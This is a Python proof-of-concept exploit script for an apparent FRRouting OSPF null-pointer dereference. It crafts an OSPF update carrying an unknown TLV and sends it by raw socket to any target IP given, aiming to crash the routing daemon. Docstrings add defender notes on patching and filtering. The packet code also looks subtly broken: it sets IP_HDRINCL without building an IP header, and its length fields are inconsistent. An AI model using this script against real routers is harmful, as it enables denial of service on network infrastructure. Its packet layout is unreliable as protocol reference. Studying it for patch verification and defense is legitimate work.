#!/usr/bin/env python3
# CVE-2025-61104 PoC - FRRouting OSPF NULL Pointer Dereference
# This PoC triggers NULL pointer dereference in show_vty_unknown_tlv function
# Usage: python3 cve_2025_61104_poc.py <target_ip>
import socket
import struct
import sys
def build_osfp_header(version, type_id, length, router_id, area_id):
    """Pack the leading bytes of the OSPF packet this PoC sends.

    All fields are written in network byte order. The function performs no
    validation and computes no checksum; it only serialises its arguments.

    Args:
        version: Value for the 1-byte version field (the caller passes 2).
        type_id: Value for the 1-byte packet-type field (the caller passes 4,
            which the original author labels "LS Update").
        length: Value for the 16-bit packet-length field.
        router_id: Raw bytes for the router ID; ``4s`` pads or truncates to
            exactly four bytes.
        area_id: Raw bytes for the area ID; same four-byte handling.

    Returns:
        A 20-byte ``bytes`` object: the 12 packed bytes followed by 8 zero
        bytes.
    """
    fixed_fields = struct.pack('!BBH4s4s', version, type_id, length,
                               router_id, area_id)
    # Eight zero bytes; the original author labels these as the
    # authentication type and authentication data.
    auth_fields = struct.pack('!Q', 0)
    return fixed_fields + auth_fields
def build_lsa_header(ls_type, ls_id, adv_router, seq_num):
    """Pack the 20-byte LSA header block used by this PoC.

    No TLV is appended here; the caller concatenates the TLV separately.

    Args:
        ls_type: Accepted for the caller's convenience; this body does not
            reference it.
        ls_id: Raw bytes for the link-state ID (four bytes after ``4s``
            padding/truncation).
        adv_router: Raw bytes for the advertising router (same handling).
        seq_num: Unsigned 32-bit sequence number.

    Returns:
        ``bytes`` of length 20 in network byte order.
    """
    packed_fields = (
        1,           # 16-bit field the original author names "age"
        60,          # 16-bit field the original author names "lsa_length"
        ls_id,
        adv_router,
        seq_num,
        0,           # labelled "Checksum" by the author; left at zero
        0,           # labelled "Length placeholder" by the author
    )
    return struct.pack('!HH4s4sIHH', *packed_fields)
def build_malicious_tlv():
    """Return the fixed TLV blob carried by this PoC.

    The blob is a 16-bit type (9999), a 16-bit length (20) and 20 zero bytes
    of value, all in network byte order. Per the file header, the author's
    intent is that a receiver treats type 9999 as unrecognised and reaches
    ``show_vty_unknown_tlv``; nothing in this file verifies that.

    Returns:
        A constant 24-byte ``bytes`` object.
    """
    value_len = 20
    type_and_length = struct.pack('!HH', 9999, value_len)
    zero_value = b'\x00' * value_len  # value is all zero bytes
    return type_and_length + zero_value
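def send_malicious_ospf_packet(target_ip):
    """Build the PoC packet and send it once to ``target_ip`` over a raw socket.

    The payload is the output of ``build_osfp_header`` followed by the LSA
    header from ``build_lsa_header`` and the TLV from ``build_malicious_tlv``.
    Progress is printed to stdout. Nothing is returned and no reply is read,
    so this function cannot tell whether the target was affected.

    Defender notes: opening a raw socket normally requires elevated
    privileges. Limiting IP protocol 89 to expected OSPF neighbours and
    enabling OSPF authentication restrict who can hand packets to the routing
    daemon; the actual fix is running an FRRouting build that contains the
    patch for the CVE named in the file header.
    NOTE(review): the byte layout built here has not been validated against
    the OSPFv2 wire format, so a target that keeps running is not evidence
    that it is patched - confirm the installed FRRouting version instead.

    Args:
        target_ip: IPv4 address string handed to ``sendto``.

    Raises:
        OSError: Propagated from socket creation, ``setsockopt`` or
            ``sendto`` (``PermissionError`` is a subclass).
    """
    # The context manager closes the socket even when setsockopt/sendto
    # raises; the original only closed it on the success path.
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, 89) as sock:  # 89 = OSPF
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

        # Destination is whatever address the caller supplied (not a fixed
        # multicast group). The second tuple element is kept from the
        # original; raw IP sockets have no port concept.
        target_addr = (target_ip, 89)

        # Fixed identifiers chosen by the PoC author.
        router_id = b'\xc0\xa8\x01\x01'  # 192.168.1.1
        area_id = b'\xc0\xa8\x01\x00'    # 192.168.1.0

        lsa_header = build_lsa_header(10, router_id, router_id, 0x80000001)
        malicious_tlv = build_malicious_tlv()
        lsa_body = lsa_header + malicious_tlv

        # Length field = LSA bytes + 24, the header size the author assumes.
        ospf_packet = build_osfp_header(2, 4, len(lsa_body) + 24,
                                        router_id, area_id)
        ospf_packet += lsa_body

        print(f"[*] Sending malicious OSPF packet to {target_ip}...")
        print(f"[*] Packet size: {len(ospf_packet)} bytes")
        # Hard-coded text: must be kept in step with build_malicious_tlv().
        print("[*] Malicious TLV type: 9999, length: 20")

        sock.sendto(ospf_packet, target_addr)
        print("[+] Packet sent successfully")
        print("[!] Target may crash if vulnerable version of FRRouting is running")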
if __name__ == "__main__":
    # Exactly one positional argument (the target address) is accepted;
    # anything else prints the usage line and exits with status 1.
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    send_malicious_ospf_packet(cli_args[0])